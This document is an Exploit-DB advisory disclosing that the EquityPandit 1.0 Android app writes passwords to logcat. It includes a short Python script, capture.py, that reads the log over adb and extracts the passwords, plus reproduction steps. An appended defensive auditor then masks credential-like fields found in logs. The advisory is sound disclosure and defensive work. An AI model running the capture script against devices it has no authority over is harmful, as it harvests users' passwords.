EquityPandit 1.0 – Password Disclosure

  • Author: ManhNho
    Date: 2019-05-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46933/
  • #Exploit title: EquityPandit v1.0 - Insecure Logging
    #Date:27/05/2019
    #Exploit Author: ManhNho
    #Software name: "EquityPandit"
    #Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
    #Version: 1.0
    # Category: Android apps
    #Description:
    
     - Developers sometimes leave sensitive data logged to the developer
     console, which makes it easy for an attacker to capture sensitive
     information such as passwords.
     - In this application, an attacker with adb access can capture the
     password of any user via the forgot password function.
    
    #Requirement:
    
     - Santoku virtual machine
     - Android virtual machine (installed "EquityPandit" apk file)
     - Victim user/password: victim@abc.com/123456
     - Exploit code named capture.py in Santoku vm as below:
    
    import re
    import subprocess
    
    # Dump the current logcat buffer once (-d) and read it as text.
    process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
                                       stdout=subprocess.PIPE,
                                       encoding='utf-8', errors='replace')
    dumps = process_handler.communicate()[0]
    # Capture whatever follows the word "password" on each log line.
    password_list = re.findall(r'password\s(.*)', dumps)
    print('Captured %i passwords! \nThey are:' % len(password_list))
    for index, item in enumerate(password_list, 1):
        print('\t#%i: %s' % (index, item))
    
    #Reproduce:
    
     - Step 1: From Santoku, use adb to connect to the Android machine (x.x.x.x)
    
    adb connect x.x.x.x
    
    
     - Step 2: On the Android machine, open EquityPandit, use the forgot
     password function for the account "victim@abc.com" and then click submit
     - Step 3: From Santoku, execute capture.py
     - Actual: The password of "victim@abc.com" is shown in the terminal as
     "123456"
    
    #Demo:
    
    https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
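
The following is an added example, not part of the original advisory or the app's own code: a pre-release check that scans captured logcat output for credential-like fields and reports the offending tag with the value masked, so the logging call can be located and removed. The key list, tag names and sample log lines are assumptions constructed for illustration.

```python
import re

# logcat "threadtime" layout: MM-DD HH:MM:SS.mmm PID TID LEVEL TAG: message
LINE_RE = re.compile(
    r'^\d\d-\d\d \d\d:\d\d:\d\d\.\d+\s+(\d+)\s+\d+\s+([VDIWEF])\s+(.*?)\s*: (.*)$')
# Assumed key list; extend it with the field names your app actually uses.
SENSITIVE_RE = re.compile(
    r'(?i)\b(password|passwd|pwd|token|otp|secret)\b(\s*[:=]\s*|\s+)(\S+)')

def _mask(hit):
    # Keep the key and separator, drop the value.
    return hit.group(1) + hit.group(2) + '***'

def audit_logcat(text):
    """Return one finding per log line that pairs a sensitive key with a value.

    Values are masked so the audit report does not become a second leak.
    'key=value' / 'key: value' is rated high; 'key value' needs human review.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = LINE_RE.match(line)
        if not parsed:
            continue  # header lines such as "--------- beginning of main"
        pid, level, tag, msg = parsed.groups()
        hit = SENSITIVE_RE.search(msg)
        if hit:
            findings.append({
                'line': lineno, 'pid': int(pid), 'level': level, 'tag': tag,
                'key': hit.group(1).lower(),
                'confidence': 'high' if hit.group(2).strip() else 'review',
                'message': SENSITIVE_RE.sub(_mask, msg),
            })
    return findings

# Constructed sample; the tag names and message layouts are hypothetical.
SAMPLE = """\
--------- beginning of main
05-27 10:15:31.101  2201  2201 I ExampleUi: Login screen opened
05-27 10:15:32.417  2201  2230 D ExampleNet: forgot response password 123456
05-27 10:15:33.009  2201  2230 D ExampleNet: refresh token=abc.def.ghi
"""

if __name__ == '__main__':
    for f in audit_logcat(SAMPLE):
        print('{line}: [{confidence}] {tag}/{level} pid={pid} {message}'.format(**f))
```

Any finding on a release build should fail the check; the reported tag points at the class whose log statement needs to be removed or stripped from release builds.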